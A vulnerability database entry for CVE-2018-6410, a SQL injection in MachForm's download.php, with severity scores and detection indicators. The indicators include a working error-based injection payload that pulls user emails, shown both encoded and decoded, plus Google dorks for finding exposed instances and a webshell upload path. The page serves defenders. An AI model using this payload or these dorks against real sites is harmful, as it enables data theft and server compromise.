cbcvebase.
CVE-2018-6410
published 2018-05-26

CVE-2018-6410: An issue was discovered in Appnitro MachForm before 4.2.3. There is a download.php SQL injection via the q parameter.

PriorityP263critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
4.97%
91.1th percentile
An issue was discovered in Appnitro MachForm before 4.2.3. There is a download.php SQL injection via the q parameter.

Affected

2 ranges
VendorProductVersion rangeFixed in
googlechrome_chrome
machformmachform

Detection & IOCsextracted from sources · hover to see the quote

urldownload.php?q=ZWw9IChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoMHgyMDIwLChTRUxFQ1QgTUlEKCh1c2VyX2VtYWlsKSwxLDUwKSBGUk9NIGFwX3VzZXJzIE9SREVSIEJZIHVzZXJfaWQgTElNSVQgMCwxKSwweDIwMjAsRkxPT1IoUkFORCgwKSoyKSl4IEZST00gSU5GT1JNQVRJT05fU0NIRU1BLkNIQVJBQ1RFUl9TRVRTIEdST1VQIEJZIHgpYSkgOyZpZD0xJmhhc2g9MSZmb3JtX2lkPTE=
commandel= (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x2020,(SELECT MID((user_email),1,50) FROM ap_users ORDER BY user_id LIMIT 0,1),0x2020,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) ;&id=1&hash=1&form_id=1
path/data/form_58009/files/
  • Detect path traversal attempts in download.php responses by looking for sequences of '../' in the decoded 'q' parameter's 'el' field value.
  • Use Google dorks to identify exposed MachForm instances: search for 'machform' inurl:"view.php" or 'machform' inurl:"embed.php".
  • Monitor for PHP webshell uploads in the MachForm data/form_*/files/ directory path, which is the known upload destination for bypassed file uploads.
  • ·The vulnerable SQL statement directly interpolates $field_name and $form_id into the query string, meaning stacked queries and error-based techniques are viable in addition to time-based blind injection — detection should cover all three classes.
  • ·File upload bypass only applies when the form's upload filter is configured as a whitelist ('allow' mode); blacklist-configured forms are not directly vulnerable to the upload bypass without first exploiting the SQLi to change the filter setting.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.